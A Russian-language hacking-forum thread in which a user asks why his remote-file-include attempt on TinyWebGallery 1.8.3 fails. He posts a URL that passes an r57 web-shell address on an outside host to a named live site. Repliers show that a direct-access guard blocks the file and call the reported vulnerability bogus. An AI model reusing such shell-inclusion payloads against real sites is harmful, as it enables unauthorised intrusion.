Проблема с Remote File Include

Имеется дыра TinyWebGallery v 1.8.3.

Файл i_basic.inc.php

Code:

<?php
include '../config.php';
 
$basedir_save = $basedir;
?>

Делаю так:

http://dcrypt.iblogger.org/i_frames/i_basic.inc.php?basedir_save=http://cyberlocos.org/shell/r57.txt

Пишет: Direct Access to this location is not allowed.
====
Что\Как сделать чтоб работало?

Урл для тестов: http://dcrypt.iblogger.org/i_frames/i_basic.inc.php?basedir_save=

 

Где тут ты усмотрел инклюд, да еще и удаленный?
Там просто конфиг инклюдится в твоем фрагменте.

 

http://www.exploit-db.com/exploits/16045/
Ммм?

 

а ты не ленись, скачай дистрибутив софта да поковыряйся. и тогда твоему взору откроется код из i_frames/i_basic.inc.php

PHP:

<?php

defined( '_VALID_TWG' ) or die( 'Direct Access to this location is not allowed.' );


...который означает, что напрямую этот файл вызывать не получиться.

а некий товарищ DIES3L, являющийся автором сего детища либо пользовался примитивным фаззером, либо убрал эту строку на своём тестовом стенде.

 

Я себе ставил двиг этот.

Тоесть ничего не выжать?

 

Автор баги нуб, нету там ничего.